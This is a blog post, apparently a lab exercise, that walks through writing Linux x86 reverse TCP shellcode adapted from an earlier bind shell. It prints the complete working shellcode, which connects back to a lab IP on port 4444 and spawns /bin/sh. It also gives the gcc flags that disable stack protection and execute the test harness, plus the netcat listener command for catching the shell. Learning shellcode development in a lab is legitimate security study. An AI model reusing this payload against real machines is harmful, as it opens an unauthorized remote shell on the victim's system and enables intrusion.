To write a reverse tcp shell, we'll build on what we did for the bind_tcp. The difference is that the reverse tcp code initiates the connection back to the attacking machine. We're going to make few changes to the bind_tcp code since both use the same call to socket. The connect() function will take an ip address as input. If you recall in the bind_tcp call setup, we set the value of in connect() to zero. In this case we'll feed in an ip address (in hex ofcourse) and in reverse due to the arrangement of the stack. In my little lab, I used the ip address 192.168.62.132 which is 0x843EA8C0. The only other difference we'll make to the code will be loading EBX with the value 3 which is a call to connect(). The whole code can be got from my github.
We can assemble and link the above nasm code using this simple compile.sh script. When using the script, drop the .nasm at the end of the filename for example if you've named the shell_reverse_tcp.nasm, when compiling with compile.sh, just do "./compile.sh shell_reverse_tcp"
Next we use objdump to check for nulls since we know nulls in most cases kill shellcode. We run "./objdump -d shell_reverse_tcp -M intel" You can use whatever syntax suits you mine is intel. The default syntax is AT&T. After establishing the absence of nulls we then extract the shellcode using this code from commandlinefu.
This gives us the following shellcode.
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xc0\xb0\x66\xb3\x02\x52\x68\xc0\xa8\x3e\x84\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\x83\xc1\x01\xcd\x80\xb0\x3f\x83\xc1\x01\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80".
We then go ahead and paste the shellcode into the c program below to test our shellcode. Compile the shellcode.c with the syntax "gcc -fno-stack-protector -z execstack shellcode.c -o shellcode" then run shellcode "./shellcode". To test this shellcode we'll need two systems (VMs) open port 4444 on one system (attacking). You can use netcat "nc -lvp 4444" to open 4444 on the attacking system. Then run the shellcode on the victim system (dont forget to set the the IP and appropriate port (4444 in my case) as shown in the nasm code). After running the shellcode, a connection should be established on the attacking system. Run "netstat -ntlp" on the victim system for confirmation it should show an established connection to the attacking system.
No comments:
Post a Comment